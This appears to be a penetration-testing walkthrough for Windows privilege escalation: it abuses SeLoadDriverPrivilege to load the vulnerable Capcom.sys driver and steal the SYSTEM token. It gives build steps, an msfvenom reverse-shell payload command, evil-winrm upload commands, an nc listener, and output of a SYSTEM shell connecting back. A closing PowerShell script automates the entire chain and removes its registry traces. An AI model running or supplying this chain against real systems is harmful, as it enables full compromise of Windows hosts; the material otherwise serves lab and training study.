Abuse #1: Install malicious driver
Requires SeLoadDriverPrivilege on the compromised account (check with `whoami /priv`). The chain below registers the signed but vulnerable Capcom.sys under HKCU with eoploaddriver, loads it, and uses ExploitCapcom to steal the SYSTEM token and launch a reverse shell. Capcom.sys is on Microsoft's vulnerable driver blocklist, so on builds that enforce it (HVCI) the load fails; the target shown here is build 14393.
1. Compile eoploaddriver
+---------------------------------------------------------------------------------------+
| 1. Open Visual Studio 2022 |
| 2. Create a new project |
| 3. Project Template : C++ Console App |
| 4. Project Name : Eoploaddriver |
| 5. Replace the generated code with eoploaddriver.cpp |
| 6. Remove the header line `#include "stdafx.h"` |
| 7. Release -> x64 |
| 8. Build -> Build Solution |
| 9. Exported to C:\Users\user\source\repos\Eoploaddriver\x64\Release\Eoploaddriver.exe |
+---------------------------------------------------------------------------------------+
Sample Output:
TO-DO
Ref: eoploaddriver.cpp
2. Download Capcom.sys
3. Compile ExploitCapcom
+----------------------------------------------------------------------------------------+
| 1. Double click ExploitCapcom.sln |
| 2. Replace the payload with `TCHAR CommandLine[] = TEXT("C:\\ProgramData\\rev.exe");` (must match the upload path of rev.exe) |
| 3. Release -> x64 |
| 4. Build -> Build Solution |
| 5. Exported to .\x64\Release\ExploitCapcom.exe |
+----------------------------------------------------------------------------------------+
Sample Output:
TO-DO
Ref: ExploitCapcom
4. Create stageless payload
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f exe -o rev.exe
Sample Output:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.31 LPORT=1337 -f exe -o rev.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: rev.exe
5. Upload
# For example, from an evil-winrm session (all four files go to C:\ProgramData)
upload EoPLoadDriver.exe C:\ProgramData\EoPLoadDriver.exe
Sample Output:
*Evil-WinRM* PS C:\programdata> upload EoPLoadDriver.exe C:\ProgramData\EoPLoadDriver.exe
Info: Uploading /home/kali/EoPLoadDriver.exe to C:\ProgramData\EoPLoadDriver.exe
Data: 20480 bytes of 20480 bytes copied
Info: Upload successful!
upload Capcom.sys C:\ProgramData\Capcom.sys
Sample Output:
*Evil-WinRM* PS C:\programdata> upload Capcom.sys C:\ProgramData\Capcom.sys
Info: Uploading /home/kali/Capcom.sys to C:\ProgramData\Capcom.sys
Data: 14100 bytes of 14100 bytes copied
Info: Upload successful!
upload ExploitCapcom.exe C:\ProgramData\ExploitCapcom.exe
Sample Output:
*Evil-WinRM* PS C:\programdata> upload ExploitCapcom.exe
Info: Uploading /home/kali/ExploitCapcom.exe to C:\programdata\ExploitCapcom.exe
Data: 335188 bytes of 335188 bytes copied
upload rev.exe C:\ProgramData\rev.exe
Sample Output:
*Evil-WinRM* PS C:\programdata> upload rev.exe C:\ProgramData\rev.exe
Info: Uploading /home/kali/rev.exe to C:\ProgramData\rev.exe
Data: 9556 bytes of 9556 bytes copied
Info: Upload successful!
6. Exploit
# Start a listener on the attacking machine
rlwrap nc -lvnp <LOCAL_PORT>
# Load the driver. Eoploaddriver enables SeLoadDriverPrivilege on the current token, creates the
# service key given as the first argument under HKCU (resolved to \Registry\User\<SID>\System\CurrentControlSet\test
# with ImagePath pointing at the second argument) and calls NtLoadDriver on it.
# The driver stays loaded afterwards; nothing in this chain unloads it.
C:\ProgramData\Eoploaddriver.exe System\CurrentControlSet\test C:\ProgramData\Capcom.sys
# Run the exploit. It opens the loaded Capcom.sys, steals the SYSTEM token and starts the payload
# path compiled in at step 3 (C:\ProgramData\rev.exe), which connects back to the listener.
C:\ProgramData\ExploitCapcom.exe
Sample Output:
*Evil-WinRM* PS C:\programdata> C:\ProgramData\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 00000221D2140008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
Sample Output (failed run: token stealing works but CreateProcess() cannot start the payload, so check that rev.exe exists at the path compiled into ExploitCapcom):
*Evil-WinRM* PS C:\programdata> C:\ProgramData\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000001937C0C0008
[+] Shellcode was executed
[+] Token stealing was successful
[-] CreateProcess() failed
Sample Output (listener, after the successful run):
$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.193] 49855
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\programdata>whoami
whoami
nt authority\system
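The whole chain as one script run from the evil-winrm PowerShell session, with the checks a practitioner wants before and after each step. This is an added example, not code from the original page or from the eoploaddriver / ExploitCapcom projects. The file paths under C:\ProgramData and the service key name are the ones used in the steps above; the cleanup of the HKCU key at the end is an assumption about what you want left on the host.

```powershell
# Added example: pre-flight checks, driver load, exploit run and cleanup for the
# Eoploaddriver + Capcom.sys chain. Paths are assumptions matching the upload step above.
$Base       = 'C:\ProgramData'
$Loader     = Join-Path $Base 'Eoploaddriver.exe'
$Driver     = Join-Path $Base 'Capcom.sys'
$Exploit    = Join-Path $Base 'ExploitCapcom.exe'
$Payload    = Join-Path $Base 'rev.exe'       # must equal the CommandLine compiled into ExploitCapcom
$ServiceKey = 'System\CurrentControlSet\test' # first argument to Eoploaddriver, created under HKCU

# 1. The chain only works if the current token holds SeLoadDriverPrivilege.
#    (whoami /priv lists it even when Disabled; Eoploaddriver enables it itself.)
$privs = whoami /priv
if (-not ($privs | Select-String -SimpleMatch 'SeLoadDriverPrivilege')) {
    throw 'Current token does not hold SeLoadDriverPrivilege; this abuse does not apply.'
}

# 2. Every file the chain references must be present. A missing payload is the usual
#    reason for "[-] CreateProcess() failed" after token stealing already succeeded.
foreach ($f in $Loader, $Driver, $Exploit, $Payload) {
    if (-not (Test-Path -LiteralPath $f)) { throw "Missing file: $f" }
}

# 3. Record the OS build: Capcom.sys is on Microsoft's vulnerable driver blocklist and
#    NtLoadDriver fails on builds that enforce it (HVCI-enabled systems).
Write-Output ("Target build: " + [System.Environment]::OSVersion.Version.ToString())

# 4. Register and load the driver. Eoploaddriver creates HKCU\<ServiceKey> with ImagePath
#    and Type values and calls NtLoadDriver on \Registry\User\<SID>\<ServiceKey>.
& $Loader $ServiceKey $Driver

# 5. Confirm the registration the loader left behind; this is also the artefact a
#    defender hunts for (a driver service key under a user hive instead of HKLM).
Get-ItemProperty -Path "HKCU:\$ServiceKey" -ErrorAction Stop | Select-Object ImagePath, Type

# 6. Run the exploit. It steals the SYSTEM token and starts $Payload, which connects
#    back to the listener started earlier (rlwrap nc -lvnp <LOCAL_PORT>).
& $Exploit

# 7. Cleanup: remove the per-user service key so the registration does not survive
#    the session. The driver itself stays loaded until it is unloaded or the host reboots.
Remove-Item -Path "HKCU:\$ServiceKey" -Recurse -Force -ErrorAction SilentlyContinue
```

Run it only after the four uploads from step 5 have completed and the listener is up; step 6 blocks in the evil-winrm session until ExploitCapcom exits, and the SYSTEM shell arrives on the listener side, not in this session.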